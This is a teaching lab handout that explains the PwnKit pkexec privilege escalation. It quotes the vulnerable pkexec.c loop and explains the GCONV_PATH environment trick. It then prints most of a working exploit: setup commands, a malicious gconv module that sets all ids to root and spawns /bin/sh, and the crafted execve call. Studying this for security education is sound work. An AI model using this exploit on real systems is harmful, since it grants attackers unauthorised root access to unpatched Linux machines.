Lab: PwnKit.

Goal

Step 4: Examining the exploit.

• The vulnerability was caused by the following code

  // from pkexec.c
   435 main (int argc, char *argv[])
   436 {
   ...
   534   for (n = 1; n < (guint) argc; n++)
   535     {
   ...
   568     }
   ...
   610   path = g_strdup (argv[n]);
   ...
   629   if (path[0] != '/')
   630     {
   ...
   632       s = g_find_program_in_path (path);
   ...
   639       argv[n] = path = s;
   640     }
      

  • note guint is just an int.
  • This and other g_ items are from the Gnome library.
• This code assumes that there are command line arguments
  • The loop on line 534 through 568 searches for command line flags.
  • And will fall out (via break, never use breaks in your code to exit loops) pointing to the command the user wishes to run with pkexec.
• But if there are no command line arguments:
  • The value of n will be 1, which is an array out of bounds error.
• Environment variables
  • You can think of environment variables as a long term setting for command line arguments.
    • This is only partially true, but it will do.
    • But you can set up all kinds of longer term configurations in environment variables.
  • They carry information needed by other programs.
  • The PATH environment variable tells the kernel where to search for programs you want to run.
    • echo $PATH
    • This is a colon (:) separated list of directories where it searches for an executable file.
  • Start a new terminal, really do this, we are going to break things.
    • type export PATH=
    • Try to run your favorite program.
    • Give up and type exit.
• iconv uses environment variables
  • GCONV_PATH : a list of dynamic libraries used to convert to and from a character set.
• It turns out that the environment variables are stored next to the arguments when execve runs.
  • Normally the kernel scrubs the environment variables of programs to be run as root.
  • It removes things that are considered to be "dangerous".
  • For our consideration, GCONV_PATH is one such variable.
  • The out of bounds index error, forces pkexec to write a value in the environment for GCONV_PATH, after the execution has begun.
• We can see this in action.
  • Look at myPkExec.c
    • This follows the exploit listed above.
  • Edit exploitArgs.c
    • Comment out the execve of args
    • Uncomment the execve of myPkExec
    • run this.
  • Note that the environment has been replaced and GCONV_PATH is back in it.
• GCONV_PATH
  • Is used by a iconv to convert fonts from one character encoding to another.
  • If this variable is defined, iconv "loads the gconv modules needed to perform conversions".
  • Since CHARSET=PWNKIT is set, iconv is assumed to be needed.
  • So the code in the pwnkit.init converter is executed.
• So what happens:
  • Look at exploit.c
  • The first part just creates the directories needed for the exploit.

  • int main(int argc, char * argv[]) {
        FILE *fp;
        system("mkdir -p 'GCONV_PATH=.';
                touch 'GCONV_PATH=./pwnkit'; 
                chmod a+x 'GCONV_PATH=./pwnkit'");
    
        system("mkdir -p pwnkit; 
               echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
             

  • Next write the handler for iconv for a new language (pwnkit) and compile it.

        fp = fopen("pwnkit/pwnkit.c", "w");
        fprintf(fp, "%s", shell);
        fclose(fp);
        system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
             

  • Shell is configured as a global variable, it contains the program

  • char *shell =
    	"#include \n"
    	"#include \n"
    	"#include \n\n"
    	"void gconv() {}\n"
    	"void gconv_init() {\n"
    	"	setuid(0);"
            "        setgid(0);\n"
    	"	seteuid(0); "
            "       setegid(0);\n"
    	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin;
                           rm -rf 'GCONV_PATH=.' 'pwnkit'; 
                           /bin/sh\");\n"
    	"	exit(0);\n"
    	"}";
             

    • The important thing here is the gconv_init()
      • Because you are running as it sets all ids to be root
      • Sets the path variable so you can run program.s
      • Removes the files created in the previous step.
      • Runs the shell.
    • I assume that gconv_init in this process.
  • Finally, set up the environment and call pkexec

  • 	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
    	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
             

• What happens (I think)
  • The gconv shared library is built.
  • The environment is setup
  • pkexec is started, with root privileges
  • the buffer overflow writes the "GCONV_PATH=./pwnkit" argument back into the environment (it was potentially stripped by ld.so)
    • This will forcing it to use the driver installed there when the new program starts.
  • pkexec starts the executable pwnkit (which is actually an empty file)
  • But when it is invoked
    • The CHARSET variable forces the GCONV_PATH library for the language PWNKIT to be called, invoking the init function.
    • the init function removes the other files, and starts a shell as root. (Because pkexec is running as root).
    • And the attacker is running as root.